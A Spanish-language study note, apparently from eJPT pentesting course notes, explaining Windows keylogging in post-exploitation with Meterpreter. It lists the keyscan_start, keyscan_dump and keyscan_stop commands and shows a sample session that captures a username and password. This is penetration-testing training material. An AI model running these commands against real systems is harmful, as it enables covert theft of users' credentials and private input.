> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/postexplotacion-en-windows/windows-keylogging.md).

# Windows Keylogging

## ¿Qué es el Keylogging?

**Keylogging** es la técnica que permite **registrar todas las pulsaciones de teclas** realizadas en un sistema. Se trata de una herramienta ampliamente utilizada en fases de **post-explotación**, pero también puede emplearse en escenarios físicos mediante dispositivos USB maliciosos o software espía diseñado para capturar datos sensibles.

***

## 🛠 Aplicaciones del Keylogging

El keylogging puede utilizarse con diversos fines dentro del hacking ético o pentesting:

* Capturar credenciales escritas manualmente.
* Registrar comandos introducidos por usuarios privilegiados.
* Obtener datos sensibles como mensajes o tokens temporales.

Aunque existen dispositivos físicos especializados, el **framework Metasploit** y su payload **Meterpreter** ofrecen funcionalidades de keylogging sin necesidad de instalar software persistente en el sistema objetivo.

***

## 🎯 Keylogging con Meterpreter

Una vez obtenida una sesión **Meterpreter** en un sistema Windows comprometido, podemos utilizar sus capacidades nativas para **iniciar y detener la captura de teclas**.

#### 🧪 Comandos principales:

```bash
meterpreter > keyscan_start       # Inicia la captura de teclas
meterpreter > keyscan_dump        # Muestra las teclas capturadas
meterpreter > keyscan_stop        # Detiene el keylogger
```

> 💡 *Estos comandos se ejecutan directamente desde la consola Meterpreter, sin necesidad de cargar módulos adicionales.*

***

### 📝 Ejemplo práctico:

```bash
meterpreter > keyscan_start
[*] Keylogger started

... (esperas mientras el usuario escribe) ...

meterpreter > keyscan_dump
Keystrokes captured:
username: admin
password: winter2024!

meterpreter > keyscan_stop
[*] Keylogger stopped
```
